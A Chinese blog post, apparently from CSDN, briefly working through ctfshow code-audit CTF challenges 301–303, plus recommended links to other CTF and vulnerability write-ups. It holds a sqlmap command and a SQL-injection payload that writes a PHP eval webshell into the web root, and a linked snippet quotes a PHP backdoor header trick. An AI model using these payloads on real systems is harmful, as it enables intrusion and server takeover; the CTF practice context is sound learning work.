ctfshow代码审计篇

最新推荐文章于 2024-05-20 16:38:56 发布
最新推荐文章于 2024-05-20 16:38:56 发布
阅读量319 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jie_a/article/details/118346147
版权

芜湖今天吧驾照靠过了,累死我了,睡一天才缓过劲来

301

在这里插入图片描述
首先sql语句没过滤,考虑sql注入
用sqlmap。就行
sqlmap.py -u http://0037a292-7a81-4c5f-a925-281dba2c5fe5.challenge.ctf.show:8080/login.php --form --batch --dump
但是我没跑出来,可以利用sql写一句话
userid=a ’ union select “<?php eval($_POST[1]);?>” into outfile “/var/www/html/a.php”%23&userpwd=b
注意的是他开头是个login.php, 抓包后跳转到checklogin.php上
然后用蚁剑连接即可
之所以能写马是因为他是先查用户名是否在库中然后匹配密码的

302

还是可以写shell

303

不行了,头晕,难受

盖世大宝剑a
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
CTFSHOW 代码审计
羽的博客
12-19 4416
文章目录web301web302web303web304web305web306web307web308web309web310 web301 下载下来源码,发现checklogin.php里面的sql语句没有任何的过滤。 所以直接注入就可以了。用sqlmap跑了下得到用户名密码 admin ctfshowwwww登陆进去就有flag python sqlmap.py -u http://e62c174a-c4d4-4a58-a392-a41bfca926ee.chall.ctf.show/checkl
ctf.show代码审计(web301-web310)
wanan的博客
08-31 572
ctf.show代码审计(web301-web310)
SeaCMS海洋影视管理系统dmku存在SQL注入漏洞
最新发布
weixin_43167326的博客
05-20 1074
海洋影视管理系统(seacms,海洋cms)海洋cms是基于PHP+MySql技术开发的开源CMS,是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选。SeaCMS是基于GPL协议100%开源免费,自适应电脑、手机、平板、APP多终端入口,无加密、安全有保障!SeaCMS dmku存在SQL 注入漏洞,黑客可以利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。
CTFshow-WEB入门-代码审计
feng的博客
02-22 1716
前言 开始快乐的代码审计。 web301 源码下载下来分析一波,大部分都是无用的文件,主要还是在checklogin.php那里: $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=$result->fetch_array(MYSQLI_BOTH); if($result->
CTF之代码审计汇总
D-R0s1的博客
10-08 7126
  最近在做bugku中代码审计的题目,发现了web题目中存在着大量的php漏洞以及弱类型函数的绕过问题,现在借着bugku中的题目来统一的整理一下。希望通过整理可以温故而知新。 第一题:extract变量覆盖 焦点:extract($_GET) &lt;?php $flag='xxx'; extract($_GET); if(isset($shiyan)) { $content=trim(fi...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web214 时间盲注标准脚本
10-21
ctfshow web214 时间盲注标准脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
Ctfshow web入门 代码审计 web301-web310 详细题解 全
Jay17的博客
09-21 1701
Ctfshow web入门 代码审计 web301-web310 详细题解 全
F5 BIG-IP Next Central Manager SQL注入漏洞(CVE-2024-26026)
weixin_43167326的博客
05-10 580
技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!! CVE-2024-26026是BIG-IP Next Central Manager中的SQL注入漏洞。未经身份验证的远程攻击者可以通过向易受攻击的Next Central Manager API端点发送
CTFshow php特性 web100
Kradress的博客
12-14 793
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-21 22:10:28 # @link: https://ctfer.com */ highlight_file(__FILE__); include("ctfshow.php"); //fl
CTFSHOW WEB 1-100
weixin_54558860的博客
11-20 4007
ctfshow web 1-100
CTFshow渔人赛---神仙姐姐
CyhDl666的博客
05-13 784
刚拿到题目时候,题目给了提示 磕首千遍,原本准备在控制台上搞些骚操作,没搞出来 反而发现每次拜后都会访问 http://746d7288-51da-47d2-aff5-d71db85daac0.challenge.ctf.show:8080/sx.php 没访问一次 就会加一次拜的次数 所以 怀疑可以burpsuit直接intruder模块 这里我没用burpsuit 而是自己编写了个脚本 密码学 数据结构 让我编的奔溃 我要敲代码 import requests url="http://01.
虎符+红明谷+ctfshow渔人杯赛后复现
Atkx's Blog
04-05 1319
目录标题虎符CTFWeb-签到MISC-你会日志分析吗红明谷CTFWeb-write_shellMISC-我的心是冰冰的ctfshow渔人杯签到抽奖感受下气氛神仙姐姐阿拉丁迷飘啊飘简单二维码我跟你拼了 虎符CTF Web-签到 参考详细分析PHP源代码后门事件及其供应链安全启示 根据文章提示,添加恶意请求头 User-Agentt: zerodiumphpinfo(); 可以看到phpinfo内容 继续构造,查看根目录下的文件 User-Agentt: zerodiumsystem('ls /');
ctfshow 代码审计
qq_45951598的博客
05-21 720
web301 这里看了一下文件发现,就一些登入页面文件 然后简单看了一下文件,定位到checklogin.php这个文件,做个简单的代码审计 <?php error_reporting(0); session_start(); require 'conn.php'; $_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:""; //判断当前传入的userid是否为空,空的话返回为空 $_POST['userpwd']=!empty(
CTFshow——代码审计
D.MIND 的博客
04-07 1481
文章目录web301——SQL注入web301——SQL注入web303——报错注入web304——报错注入web305——web306——web307—— web301——SQL注入 将源码下载下来。主要看checklogin.php: $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; $result=$mysqli->query($sql); $row=
ctfshow代码审计
10-17
好的,关于ctfshow代码审计,我可以提供一些基本的信息和思路。 首先,ctfshow是一个CTF比赛平台,其代码审计主要涉及到平台的安全性和漏洞。具体来说,可以从以下几个方面入手: 1. 用户输入的安全性:检查用户输入是否存在注入漏洞、XSS漏洞等。 2. 权限控制:检查平台是否存在越权访问、未授权访问等问题。 3. 文件上传:检查文件上传功能是否存在任意文件上传漏洞。 4. 密码安全:检查密码存储方式是否安全,是否存在明文存储等问题。 5. 代码质量:检查代码是否存在逻辑漏洞、缺陷等问题。 以上是一些常见的审计点,具体还需要根据实际情况进行分析。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值